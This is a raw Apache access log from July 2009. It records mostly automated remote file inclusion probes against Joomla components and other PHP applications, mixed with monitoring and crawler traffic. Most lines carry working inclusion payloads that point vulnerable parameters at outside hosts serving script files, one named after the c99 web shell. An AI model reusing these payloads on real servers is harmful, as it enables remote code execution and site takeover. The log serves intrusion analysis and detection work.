125.248.150.52 - - [20/Jul/2009:01:59:52 -0400] "GET /logs/access_log.Q109070100//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:01:59:52 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:01:59:53 -0400] "GET /logs/access_log.Q109070100//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:01:59:53 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:01:59:56 -0400] "GET /logs/access_log.Q109070100//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:01:59:58 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:02:00:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.192 - - [20/Jul/2009:02:00:10 -0400] "GET /logs/error_log.Q109061800%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.236.47.192 - - [20/Jul/2009:02:01:34 -0400] "GET /logs/access_log.Q109060100%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
81.177.9.32 - - [20/Jul/2009:02:01:37 -0400] "GET /logs/access_log.Q109070800/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.thebalvenie.com//files/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:01:42 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:01:42 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:01:42 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:01:42 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:01:44 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt????? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:01:44 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt????? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:01:44 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt????? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:01:44 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt????? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:01:44 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt????? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:01:44 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt????? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:01:44 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt????? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:01:45 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt????? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.149.194.189 - - [20/Jul/2009:02:01:53 -0400] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/v2-id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
89.149.194.189 - - [20/Jul/2009:02:01:55 -0400] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/v2-id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
89.149.194.189 - - [20/Jul/2009:02:02:13 -0400] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/v2-id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
89.149.194.189 - - [20/Jul/2009:02:02:13 -0400] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/v2-id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
216.93.186.188 - - [20/Jul/2009:02:02:16 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:02:02:16 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:02:02:16 -0400] "GET /logs/access_log.Q109051000///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
222.236.47.192 - - [20/Jul/2009:02:02:18 -0400] "GET /logs/error_log.Q109061800%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:02:02:18 -0400] "GET /logs/access_log.Q109052700///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
89.19.3.66 - - [20/Jul/2009:02:02:39 -0400] "GET /logs/access_log.Q109070100//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
89.19.3.66 - - [20/Jul/2009:02:02:39 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
66.249.68.70 - - [20/Jul/2009:02:02:53 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L013D4B4048A4F6001E9108V+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.93.186.188 - - [20/Jul/2009:02:02:57 -0400] "GET /logs/access_log.Q109051000%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:02:02:57 -0400] "GET /logs/access_log.Q109052700%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
66.11.230.93 - - [20/Jul/2009:02:03:10 -0400] "GET /logs/access_log.Q109052800/rgboard//include/mail.inc.php?skin_board_path=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
66.11.230.93 - - [20/Jul/2009:02:03:10 -0400] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 227 "-" "libwww-perl/5.65"
66.11.230.93 - - [20/Jul/2009:02:03:10 -0400] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
222.236.47.192 - - [20/Jul/2009:02:04:25 -0400] "GET /logs/access_log.Q109061200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:05:05 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:05:05 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:02:05:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
93.190.41.97 - - [20/Jul/2009:02:05:08 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:05:08 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
81.177.9.32 - - [20/Jul/2009:02:05:26 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.thebalvenie.com//files/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.177.9.32 - - [20/Jul/2009:02:05:26 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.thebalvenie.com//files/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
81.177.9.32 - - [20/Jul/2009:02:05:26 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.thebalvenie.com//files/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:05:26 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:05:26 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
81.177.9.32 - - [20/Jul/2009:02:05:45 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.thebalvenie.com//files/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.93 - - [20/Jul/2009:02:05:47 -0400] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 227 "-" "libwww-perl/5.65"
118.45.190.166 - - [20/Jul/2009:02:06:24 -0400] "GET //errors.php?error=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:06:24 -0400] "GET /logs//errors.php?error=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:06:24 -0400] "GET /logs/access_log.Q109070500//errors.php?error=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.93 - - [20/Jul/2009:02:07:01 -0400] "GET /logs/access_log.Q109070200/rgboard//include/mail.inc.php?skin_board_path=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
118.45.190.166 - - [20/Jul/2009:02:07:26 -0400] "GET /logs/access_log.Q109062100//errors.php?error=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
81.177.9.32 - - [20/Jul/2009:02:08:08 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.thebalvenie.com//files/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.177.9.32 - - [20/Jul/2009:02:08:08 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.thebalvenie.com//files/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
114.200.199.144 - - [20/Jul/2009:02:08:35 -0400] "GET /logs/access_log.Q109061500////?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
114.200.199.144 - - [20/Jul/2009:02:08:35 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 200 10269 "-" "Mozilla/5.0"
114.200.199.144 - - [20/Jul/2009:02:08:35 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
114.200.199.144 - - [20/Jul/2009:02:09:02 -0400] "GET /logs/access_log.Q109061500////?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
114.200.199.144 - - [20/Jul/2009:02:09:03 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 200 10269 "-" "Mozilla/5.0"
114.200.199.144 - - [20/Jul/2009:02:09:03 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:02:10:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.200.199.144 - - [20/Jul/2009:02:10:51 -0400] "GET /logs/access_log.Q109061500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
200.204.51.161 - - [20/Jul/2009:02:10:57 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.robertobirindelli.com.br/adm/scripts/c99.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
114.200.199.144 - - [20/Jul/2009:02:11:16 -0400] "GET /logs/access_log.Q109061500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:11:27 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:11:27 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:11:27 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
212.193.229.157 - - [20/Jul/2009:02:12:00 -0400] "GET /logs/error_log.Q109051200/plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
93.190.41.97 - - [20/Jul/2009:02:12:01 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:13:34 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
93.190.41.97 - - [20/Jul/2009:02:13:41 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:02:15:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
99.56.243.74 - - [20/Jul/2009:02:15:15 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows 6.0; MSIE 7.0.6001.18000)"
99.56.243.74 - - [20/Jul/2009:02:15:16 -0400] "GET /favicon.gif HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows 6.0; MSIE 7.0.6001.18000)"
99.56.243.74 - - [20/Jul/2009:02:15:16 -0400] "GET /CGI-BIN/favicon.ico HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows 6.0; MSIE 7.0.6001.18000)"
99.56.243.74 - - [20/Jul/2009:02:15:16 -0400] "GET /CGI-BIN/favicon.gif HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows 6.0; MSIE 7.0.6001.18000)"
72.30.78.231 - - [20/Jul/2009:02:14:59 -0400] "GET /logs/access_log.Q109051100 HTTP/1.0" 200 5205411 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.192 - - [20/Jul/2009:02:15:57 -0400] "GET /logs/access_log.Q109061200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:01 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:01 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:01 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:02 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:02 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:02 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:09 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:09 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:09 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:11 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:11 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:11 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:13 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:13 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:13 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:16 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:16 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:16 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:28 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:38 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:39 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:39 -0400] "GET /logs/access_log.Q109070200%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:39 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:40 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:41 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:41 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:41 -0400] "GET /logs/access_log.Q109070200%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:42 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:42 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:42 -0400] "GET /logs/access_log.Q109070200%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:42 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:42 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:42 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
